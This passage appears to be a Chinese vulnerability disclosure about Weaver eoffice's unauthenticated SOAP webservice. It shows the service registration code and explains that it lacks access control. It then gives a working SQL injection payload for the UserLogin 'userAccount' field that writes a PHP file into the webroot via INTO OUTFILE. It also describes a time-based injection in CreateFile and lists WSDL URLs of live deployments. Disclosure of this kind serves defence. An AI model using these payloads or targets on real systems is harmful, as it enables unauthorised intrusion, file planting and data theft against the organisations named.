$server->register( "SendMessage", array( "fromUserID" => "xsd:string", "toUserID" => "xsd:string", "content" => "xsd:string", "attachmentID" => "xsd:string", "attachmentName" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#SendMessage", "rpc", "encoded", "SendMessage" );

$server->wsdl->addComplexType( "messageReturnArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:messageReturn[]" ) ), "tns:messageReturn" );

$server->wsdl->addComplexType( "messageReturn", "complexType", "struct", "all", "", array( "fromUserName" => array( "name" => "fromUserName", "type" => "xsd:string" ), "content" => array( "name" => "content", "type" => "xsd:string" ), "sendTime" => array( "name" => "sendTime", "type" => "xsd:string" ), "fromUserAvatar" => array( "name" => "fromUserAvatar", "type" => "xsd:string" ), "fromUserID" => array( "name" => "fromUserID", "type" => "xsd:string" ), "smsID" => array( "name" => "smsID", "type" => "xsd:string" ), "smsType" => array( "name" => "smsType", "type" => "xsd:string" ), "attachmentID" => array( "name" => "attachmentID", "type" => "xsd:string" ), "attachmentName" => array( "name" => "attachmentName", "type" => "xsd:string" ), "typeText" => array( "name" => "typeText", "type" => "xsd:string" ), "typeUrl" => array( "name" => "typeUrl", "type" => "xsd:string" ), "smsTypeName" => array( "name" => "smsTypeName", "type" => "xsd:string" ) ) );

$server->register( "GetMessage", array( "userID" => "xsd:string", "isOnlyNew" => "xsd:boolean" ), array( "return" => "tns:messageReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetMessage", "rpc", "encoded", "GetMessage" );

$server->register( "SetMessageRead", array( "userID" => "xsd:string", "messageIDStr" => "xsd:string", "fromUserID" => "xsd:string" ), array( ), "urn:EofficeService", "urn:EofficeService#SetMessageRead", "rpc", "encoded", "SetMessageRead" );

$server->register( "CreateFile", array( "subject" => "xsd:string", "attachmentIDStr" => "xsd:string", "attachmentNameStr" => "xsd:string", "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#CreateFile", "rpc", "encoded", "CreateFile" );

$server->wsdl->addComplexType( "newVersionReturnArray", "complexType", "struct", "all", "", array( "version" => array( "name" => "version", "type" => "xsd:string" ), "readme" => array( "name" => "readme", "type" => "tns:newVersionReadmeArray" ) ) );

$server->wsdl->addComplexType( "newVersionReadmeArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:newVersionReadme[]" ) ), "tns:newVersionReadme" );

$server->wsdl->addComplexType( "newVersionReadme", "complexType", "struct", "all", "", array( "subject" => array( "name" => "subject", "type" => "xsd:string" ), "describe" => array( "name" => "describe", "type" => "xsd:string" ), "image" => array( "name" => "image", "type" => "xsd:string" ) ) );

$server->register( "GetNewVersion", array( ), array( "return" => "tns:newVersionReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetNewVersion", "rpc", "encoded", "GetNewVersion" );

$server->register( "Attend", array( "userID" => "xsd:string", "deptID" => "xsd:string", "privID" => "xsd:string", "checkType" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#Attend", "rpc", "encoded", "Attend" );

$server->register( "CheckIsSignIn", array( "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#CheckIsSignIn", "rpc", "encoded", "CheckIsSignIn" );

$server->service( $HTTP_RAW_POST_DATA );

?>

 

1.这个文件内容,直到最后也没有任何auth控制,也就是说我们可以通过未授权访问了

2.传递参数HTTP_RAW_POST_DATA 这个不走gpc





为了方便期间,我这里偷个懒,

对http://eoffice.sccm.cn/attachment/mysql_log.sql

这个站点mysql配置了抓取

072357509505212ce7519bae7032b7df9adcb596[1]

测试完了,删除即可





然后我再次偷懒,下载了wsdigger软件,进行webservice的wsdl文件解析

0723593778eac7434dedd8c32cb8791b3a9d72ea[1]

首先我们看信息泄露:

0800022466bef079373eb3730b51c558257c6e7a[1]

080002327593ba3847729fdd315c6cec93788248[1]

08000242a2aa5232fc65987b113750b3b7f9117f[1]

然后我们看sql注射,这里我举两个例子就可以了,因为这个里面的sql语句都带有\r\n\t\t\t\做换行,这种的注释,直接/*就可以做到,其他的都不管用



先看UserLogin 这个借口:



里面的 userAccount 为



admin' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,1,'wooyun' into outfile 'D:/eoffice/webroot/attachment/wooyun.php'#

080026463320d05372545adf3a4f337e0237ab84[1]

08002746b1da122c2a92929032f8c47f69cede86[1]

访问:

http://eoffice.sccm.cn/attachment/wooyun.php

08002820775d1ecfa15b71651a4792802fee34a0[1]

下来看看 第二种sql注射:



测试createFile这个接口:

080030569799515b48fe7799eaf21da00a1c464d[1]

当你点击invoke时候就会发成延迟,我们抓取到的sql语句为:

08003222dce5dab6c090039730c9d55c28c22879[1]

ok 统计一下有10处,案例不多举例子了





http://oa.sccm.cn//webservice/eoffice.wsdl.php?wsdl

http://oa.vma.cn/webservice/eoffice.wsdl.php?wsdl

http://eoffice.sccm.cn/webservice/eoffice.wsdl.php?wsdl

http://eoffice8.weaver.cn:8028/webservice/eoffice.wsdl.php?wsdl

发表评论